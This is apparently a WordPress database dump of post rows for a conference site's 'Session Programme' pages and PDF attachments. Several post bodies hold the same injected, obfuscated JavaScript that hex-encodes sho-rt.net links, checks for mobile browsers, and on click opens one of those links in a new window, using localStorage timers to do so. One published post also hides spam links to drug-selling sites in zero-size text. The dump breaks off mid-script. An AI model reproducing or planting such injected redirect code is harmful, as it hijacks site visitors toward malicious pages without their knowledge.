_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Programme','','inherit','closed','closed','','5122-revision-v1','','','2023-08-23 08:14:21','2023-08-23 08:14:21','',5122,'https://gsw2023.com/?p=5377',0,'revision','',0),
(5381,1,'2023-08-23 08:20:44','2023-08-23 08:20:44','','GSW2023-Program-2023-08-23','','inherit','open','closed','','gsw2023-program-2023-08-23','','','2023-08-23 08:20:44','2023-08-23 08:20:44','',5122,'https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-23-1.pdf',0,'attachment','application/pdf',0),
(5382,1,'2023-08-23 08:22:22','2023-08-23 08:22:22','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Programme','','inherit','closed','closed','','5122-revision-v1','','','2023-08-23 08:22:22','2023-08-23 08:22:22','',5122,'https://gsw2023.com/?p=5382',0,'revision','',0),
(5383,1,'2023-08-23 08:28:15','2023-08-23 08:28:15','<span style=\"font-size:0px; color:<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.levitramall.com/\">樂威壯</a>\n</span>#ff0000;\">﻿<a href=\"https://www.cialisbro.cc/\">犀利士</a>\n</span>','Session Program','','publish','closed','closed','','session-program','','','2023-10-03 13:30:00','2023-10-03 13:30:00','',0,'https://gsw2023.com/?p=5383',0,'post','',0),
(5386,1,'2023-08-23 08:26:58','2023-08-23 08:26:58','','GSW2023-Program-2023-08-23','','inherit','open','closed','','gsw2023-program-2023-08-23-2','','','2023-08-23 08:26:58','2023-08-23 08:26:58','',5383,'https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-23-2.pdf',0,'attachment','application/pdf',0),
(5387,1,'2023-08-23 08:28:15','2023-08-23 08:28:15','','Session Program','','inherit','closed','closed','','5383-revision-v1','','','2023-08-23 08:28:15','2023-08-23 08:28:15','',5383,'https://gsw2023.com/?p=5387',0,'revision','',0),
(5389,1,'2023-08-23 08:31:08','2023-08-23 08:31:08','','GSW2023-Program-2023-08-23','','inherit','open','closed','','gsw2023-program-2023-08-23-3','','','2023-08-23 08:31:08','2023-08-23 08:31:08','',5383,'https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-23-3.pdf',0,'attachment','application/pdf',0),
(5390,1,'2023-08-23 08:41:34','2023-08-23 08:41:34','<p style=\"text-align: center;\">[pdf-embedder url=\"https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-13.doc.pdf\"]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a